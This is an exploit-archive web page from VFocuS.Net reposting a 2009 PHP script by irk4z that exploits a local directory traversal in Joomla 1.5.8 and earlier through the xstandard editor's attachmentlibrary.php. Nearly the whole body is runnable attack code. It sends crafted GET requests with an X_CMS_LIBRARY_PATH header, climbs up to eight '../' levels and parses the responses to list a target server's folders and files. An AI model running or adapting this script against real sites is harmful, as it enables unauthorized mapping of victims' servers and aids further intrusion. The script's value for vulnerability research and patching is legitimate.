首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability
来源:irk4z[at]yahoo.pl 作者:irk4z 发布时间:2009-01-07  
<?php
/*
Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability

discovered by: irk4z[at]yahoo.pl
greets: all friends ;)
*/

echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n";
echo "* discovered by: irk4z[at]yahoo.pl\n";
echo "*\n";
echo "* greets: all friends ;) enjoy!\n";
echo "*------------------------------------------------------------------*\n";

$host = $argv[1];
$path = $argv[2];
$folder = $argv[3];

if (empty($host) || empty($path)) {
echo "usage: php {$argv[0]} <host> <path> [<folder>]\n";
echo "       php {$argv[0]} example.org /joomla\n";
echo "       php {$argv[0]} example.org /joomla ../../\n";
exit;
}

echo "http://" . $host . $path . "/images/stories/\n\n";

if ( empty($folder) ){
$lev = "./";
for( $i = 0; $i <= 7; $i++ ) {
echo browseFolder($host, $path, $lev);
$lev .= "../";
}
} else {
echo browseFolder($host, $path, $folder);
}

function browseFolder($host, $path, $folder){

$packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "X_CMS_LIBRARY_PATH: {$folder}\r\n";
$packet .= "Connection: Close\r\n\r\n";

$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}

fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);

$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "\n[x] 404 Not Found... Maybe wrong path? \n";
die;
}

//folders
preg_match_all("/<baseURL>([^<]+)<\/baseURL>/", $data, $matches);
//files
preg_match_all("/<value>([^<]+\.[^<]{3,4})<\/value>/", $data, $matches2);

$matches = array_merge( $matches[1], $matches2[1] );

if ( empty($matches) ){
$ret = "$folder [x] Failed...\n";
} else {
$ret = '';
foreach( $matches as $tmp){
$ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . "\n";
}
}

return ($ret);
}

?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cain & Abel 4.9.25 (Cisco IOS-
·CoolPlayer BUILD 219 'Playlist
·CoolPlayer BUILD 219 (Playlist
·VUPlayer version 2.49 local de
·Perception LiteServe 2.0.1 (us
·SeaMonkey <= 1.1.14 (marquee)
·Audacity 1.6.2 (.aup File) Rem
·Rosoft Media Player 4.2.1 Loca
·VUPlayer <= 2.49 .PLS Universa
·Goople <= 1.8.2 (frontpage.php
·WinAmp GEN_MSN Plugin Heap Buf
·Debian GNU/Linux XTERM (DECRQS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved